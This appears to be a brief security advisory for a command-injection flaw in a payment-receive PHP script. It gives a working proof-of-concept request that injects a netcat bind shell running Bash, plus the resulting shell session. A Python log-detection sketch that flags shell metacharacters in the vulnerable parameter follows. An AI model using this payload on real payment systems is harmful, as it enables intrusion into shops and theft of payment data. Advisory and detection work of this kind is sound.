ewire Payment Client Command Execution Vulnerability
The following proof of concept will open a listening Bash shell on TCP port 6666 of a vulnerable shop or payment gateway.

GET http://www.example.com/simplePHPLinux/3payment_receive.php?paymentinfo=`/bin/nc -l -p6666 -e /bin/bash`

$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
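
The request above leaves a recognizable trace in web server access logs. The following detection sketch is an added example, not part of the original advisory: it flags requests to 3payment_receive.php whose paymentinfo value contains shell metacharacters after URL decoding. The combined-style log format, the sample lines, and the assumption that legitimate paymentinfo values never contain these characters are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate paymentinfo value never contains these characters.
SHELL_META = re.compile(r"[`;|&<>\n\r]|\$\(")
# Request field of a combined-style access log; the URI may hold raw spaces.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
TARGET_SCRIPT = "3payment_receive.php"   # script named in the advisory
TARGET_PARAM = "paymentinfo"             # parameter named in the advisory

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /simplePHPLinux/3payment_receive.php?paymentinfo=ORDER-1001 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2000:00:00:02 +0000] "GET /simplePHPLinux/3payment_receive.php?paymentinfo=%60id%60 HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2000:00:00:03 +0000] "GET /simplePHPLinux/3payment_receive.php?paymentinfo=`id` HTTP/1.0" 200 0',
    '192.0.2.11 - - [01/Jan/2000:00:00:04 +0000] "GET /index.php?q=%60id%60 HTTP/1.1" 200 900',
]

def suspicious_requests(log_lines):
    """Return (client, decoded_value) for each flagged paymentinfo value."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        try:
            url = urlsplit(m.group(1))
        except ValueError:          # malformed URI: skip here, review separately
            continue
        if not url.path.endswith("/" + TARGET_SCRIPT):
            continue
        # parse_qsl percent-decodes, so %60 and a raw backtick look the same.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() == TARGET_PARAM and SHELL_META.search(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent suspicious paymentinfo: {value!r}")
```
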